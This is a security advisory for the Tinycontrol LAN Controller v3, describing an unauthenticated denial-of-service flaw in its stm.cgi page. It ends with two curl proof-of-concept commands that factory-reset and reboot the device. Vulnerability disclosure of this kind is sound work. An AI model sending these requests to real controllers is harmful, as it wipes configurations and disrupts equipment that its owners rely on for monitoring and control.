Tinycontrol LAN Controller 3 Denial Of Service

`  
Tinycontrol LAN Controller v3 (LK3) Remote Denial Of Service Exploit  
  
  
Vendor: Tinycontrol  
Product web page: https://www.tinycontrol.pl  
Affected version: <=1.58a, HW 3.8  
  
Summary: Lan Controller is a very universal  
device that allows you to connect many different  
sensors and remotely view their readings and  
remotely control various types of outputs.  
It is also possible to combine both functions  
into an automatic if -> this with a calendar  
when -> then. The device provides a user interface  
in the form of a web page. The website presents  
readings of various types of sensors: temperature,  
humidity, pressure, voltage, current. It also  
allows you to configure the device, incl. event  
setting and controlling up to 10 outputs. Thanks  
to the support of many protocols, it is possible  
to operate from smartphones, collect and observ  
the results on the server, as well as cooperation  
with other I/O systems based on TCP/IP and Modbus.  
  
Desc: The controller suffers from an unauthenticated  
remote denial of service vulnerability. An attacker  
can issue direct requests to the stm.cgi page to  
reboot and also reset factory settings on the device.  
  
Tested on: lwIP  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2023-5785  
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php  
  
  
18.08.2023  
  
--  
  
  
$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings  
$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1 # reboot controller  
`